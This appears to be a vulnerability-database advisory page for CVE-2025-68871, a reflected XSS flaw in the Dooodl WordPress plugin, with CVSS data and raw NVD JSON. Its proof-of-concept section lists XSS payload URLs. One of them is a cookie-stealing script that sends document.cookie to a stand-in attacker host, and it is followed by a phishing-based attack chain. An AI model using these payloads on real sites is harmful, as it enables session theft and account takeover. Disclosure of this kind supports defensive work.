Security Vulnerability Report
CVE-2025-68871 CVSS 7.1 HIGH

CVE-2025-68871

Published: 2026-01-22 17:16:12
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in noCreativity Dooodl dooodl allows Reflected XSS. This issue affects Dooodl: from n/a through <= 2.3.0.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Dooodl <= 2.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-68871 PoC - Reflected XSS in Dooodl WordPress Plugin -->
<!-- Target: WordPress site with Dooodl plugin <= 2.3.0 -->
<!-- Basic XSS PoC URL -->
<!-- Replace 'TARGET_URL' with the vulnerable WordPress site URL -->
<!-- PoC: https://TARGET_URL/wp-content/plugins/dooodl/?param=<script>alert('XSS')</script> -->
<!-- More Obfuscated PoC -->
<!-- PoC: https://TARGET_URL/wp-content/plugins/dooodl/?param=<img src=x onerror=alert(document.domain)> -->
<!-- Cookie Stealing PoC -->
<!-- PoC: https://TARGET_URL/wp-content/plugins/dooodl/?param=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script> -->
<!--
Attack Chain:
1. Attacker crafts malicious URL with XSS payload
2. Attacker tricks victim into clicking the link (phishing email, social engineering)
3. Victim's browser sends request to vulnerable server
4. Server reflects unsanitized input in response
5. Victim's browser executes malicious script
6. Attacker steals session cookies or performs actions as victim
-->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68871", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:12.417", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in noCreativity Dooodl dooodl allows Reflected XSS.This issue affects Dooodl: from n/a through <= 2.3.0."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en noCreativity Dooodl dooodl permite XSS Reflejado. Este problema afecta a Dooodl: desde n/a hasta &lt;= 2.3.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/dooodl/vulnerability/wordpress-dooodl-plugin-2-3-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}